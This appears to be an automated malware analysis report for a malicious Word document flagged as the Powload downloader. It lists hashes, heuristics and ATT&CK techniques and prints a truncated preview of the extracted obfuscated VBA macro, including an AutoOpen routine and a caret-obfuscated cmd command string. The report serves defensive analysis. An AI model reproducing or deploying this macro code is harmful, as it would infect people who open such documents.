Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e8d02a9ed4c26e13…

MALICIOUS

Office (OLE)

Size: 150.4 KB | Created: 2018-09-24 06:20:00 | Authoring application: Microsoft Office Word | First seen: 2019-04-18
MD5: 359e11cd67950efde33a69a3199da7f7
SHA-1: a9913b0915ec56370c0de25245d5a25ff742b071
SHA-256: e8d02a9ed4c26e130a249bfb471a0f8880d06cf998a4cf55731131fb37e4bd52
Risk Score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic | T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine, so the code runs as soon as the document is opened with macros enabled. The macro calls the Shell() function, which fires a critical heuristic because it indicates an attempt to execute arbitrary commands. The ClamAV detection 'Doc.Malware.Powload-6922948-0' further confirms its malicious nature. The macro's obfuscation prevents a precise determination of its payload, but its intent is clearly to download and execute a second-stage threat.

Heuristics (6)

  • ClamAV: Doc.Malware.Powload-6922948-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6922948-0
  • VBA macros detected [medium] (2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 105236 bytes
SHA-256: 14d9c6cbaca87399c2841c3e073ce3c4c286fd85a4ec18f7e4c906cdf296182d
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "mFFOpiAjnE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim zTblRk(1)
zTblRk(0) = Left(LrlZCclKnW + VSvKWrSCzQvRmPWsVcFUztfmmFpnKSUFiYR + RPXvwTnJNOS, 346) + MidB(UXKzRqFjzKc + SolwbGCoEaNzZsZqXVQpzYzYVlRMSMU + cPqLroPwzA, 844, 970) + Left(HmGUJSGR + ihCnNunEXHwhKZBjkWZsiKZLsK + KoOdJlciC, 247) + Mid(VJfFwuHiVvB + pXcojvtUlmShPQHCUwXVfUOz + sPnuUUOzuT, 339, 875)
   Dim DbJROT(1)
DbJROT(0) = MidB(HEZNroLRB + VCdhpFvRKNaPLBFOumfKXfP + fYAnRZidZt, 387, 242) + Mid(riudKBq + fwujqrGBaqXmmiJqhXfUbknfdCFMhwaUp + nlTruVvQFwUUT, 385, 350)
   Dim smPfr(1)
smPfr(0) = MidB(bpzKRCzTVw + AWzYNuCHHAubqvmhzRLtYnJDLBawTCHbBtOB + TMbvXUWFLmVjf, 133, 537) + MidB(dErqFjC + jUvtTzjVZMBXpjGcnXAzTqkzuzNf + zkCJRSXAKh, 295, 429) + MidB(OKkOrZn + VcCizmVLjnjXiwZVESjwqfijOw + hwAjhOkYOoVijT, 653, 193) + Mid(pVVAnQlfMDQCH + nwZDzPKljYYzBWzYDbJhKkvBChHLhI + VIGiYfkobPTkSp, 118, 844)
pzdrMmcd (KeyString(vbKeyC) + KeyString(vbKeyM) + SICWw + wDVGZcO + HSwCLczUi + LNklztmMcXVjT)
   Dim JhlsPt(2)
JhlsPt(0) = MidB(hEwlZqsZ + atikjWaqAqmmcUSjmbwNGCj + MVkwdbto, 25, 481) + MidB(SjDzQuSTQ + aqFdijbhCUTUQrIKauTTTrsQqHNh + wKIYwPHZr, 921, 892) + Mid(jjYmHljWc + lllPlZonZEGjjMTYXZTbJjR + wIsVDln, 250, 582) + MidB(RHGbLNapCvRKV + zSJbfTEirQLzwwzojQSrPvJcTKizW + oVDCMUNYPL, 998, 271)
JhlsPt(1) = MidB(FwciJpSiaujWr + MSpEhJbvmTXrCjPhllBTNGCJuIW + cACsKJpjiAq, 211, 339) + Left(buiwlFXLLzb + AjnQdOurznEvEiMLIbhziXEXFprtjL + zNZhDYkbHZb, 807) + Left(wArfJESjItYqo + uVLlYlwlsPrFsEvQqqBDCFNQF + NjiTMDPE, 546) + Right(PQmtNNo + JTXLRsRJfKUtERjImjBjJqblQIrAcB + tLWBUlFZRjGKwH, 258)
End Sub


Attribute VB_Name = "ICQzZKVpHBB"
Function SICWw()
Dim zCrSNn(2)
zCrSNn(0) = Left(nnZilTRuq + CIjKXPvrcqZojsBNuDZLfFJMzCz + DlibTrUD, 344) + Left(aNckwtSDT + YcwAFNDpibNHDERGWcHKkRcZN + uwvCMCiSmGAW, 125) + Right(AUhtckhMuYRRLj + ppFkfSFqCmPjzGAZlRIiwNjAiukSj + KhAAUiOqr, 803) + MidB(MYRQsaSTwVKHWv + wRTjZhLYAYRtBcodQWdssRqVpW + YQnuaVoYfNs, 321, 379)
zCrSNn(1) = Left(avtWdGZpOSYb + LVCHusSGGBSorOTMYihQzPXwbYbBuZpUrq + QQTorEpOia, 907) + MidB(thRkZCrXurhiAY + XWdDzRQlEvZIQAdArXjSnR + ZmJrfaLLDS, 47, 6) + Right(VwUGROdqD + XXfnEplzvqJcNPzFwLTBZazhznsijAtICj + dQCfZLWHqSRXus, 792) + Right(wdDHIlKCIabUHw + wiCztAqNpqhWorLwKGsVfrdRkvnj + pzJmzDv, 739)
   Dim RDohT(2)
RDohT(0) = Right(XwqNOENXH + FSCGMVfqhZzHQdbDbwBfQnfnatwPpnM + OLrSBcCqXp, 609) + MidB(dKvDVkEmlShi + kJKTwkGMrjltVztwzqpPmTbbkcsKjwf + NVhMiRSMSbPF, 960, 860) + MidB(sQiwqYBWIWjw + zqiIjdRKzTHUrMkYcrjwSqpTKE + TnQdZXpMqPOF, 698, 596) + Left(KKljzZw + tPRqJGZBPUDNnzwXiaMnHlIASYjt + MfHYVjJ, 778)
RDohT(1) = Right(fOAwWmnbrj + jcJFBGHdjGdzBrXBBDrIslLiflHB + VwfOPfDjao, 478) + Left(vPvPZqf + oURUpbcrYVYjIMVAHwDjGiQOkW + bhCKKzvq, 520) + Mid(PUQdPGiGoVfk + kKlYNsUrtuqiBLqiZDNoEBHBQtpwzfZan + NMOXbVnkI, 638, 899) + Right(FjIwVThXFqEzD + wZbXhNLqzQnURzUVvzrcEUcuIVJZX + mjGWQdtqJfiwPG, 121)
   Dim XjIjqB(2)
XjIjqB(0) = Right(dbVRFqEwilEHYa + CowWsTUlQHoQiFKOFjrtNXcFt + azVGjBCXFKGK, 622) + MidB(PirwaBOLIUKv + QObrzqJSJJlbiFwVKEiNuskLlNmWGSZow + jzZzYiNzTJ, 133, 186)
XjIjqB(1) = MidB(rGqWAjw + YFXniJJQITCEEKVfhtiDnVPLi + zVRUBrBuiqKswq, 926, 424) + Mid(jBUwFwc + jRPzbwMhMjDSUDGJjNrzcJBQbAP + HqRdSsjulWPJC, 973, 259)
   Dim BuRSLa(1)
BuRSLa(0) = Right(czjDnfQRj + bNmUoHnshjBMiwWksjbfMjow + bhIqwcdodGZ, 258) + Right(lSvUYoJuwwJn + ZlAKkPFzBLQChsMLiPtoTXOTjiJjIbwO + PdDdlRj, 79) + MidB(bCmnfYInfz + VwZRriHaYTBGBLOIcEPBivWBkTIitZcHH + ZFwvuIAjrd, 238, 880) + Right(tQkbEvV + WHPkHhTuEKnwTGzjfYYZifAIs + IzEcanf, 467)
crizDMTm = "d /V/C" + CStr(Chr(5 + 3 + 0 + 1 + 25)) + "^s" + "^e^t " + "#^+^$=" + "/^_^\ ^_/" + "^-^ ^" + "_^\- _^-" + "^\^ -^\_ \^_/" + "^ /^-\"
Dim GGBua(1)
GGBua(0) = MidB(HBipqZsJ + vXqXzSDzfqWBshfsNnUtcVkcJVq + QraiAfJnw, 950, 887) + Mid(FJcIKjfWtcadO + qtbpAFkBafNEzdroQazBKJKvX + AlivwEVEBiUICF, 599, 373)
   Dim QLAmZ(2)
QLAmZ(0) = Left(rsQfqJNmaDt
... (truncated)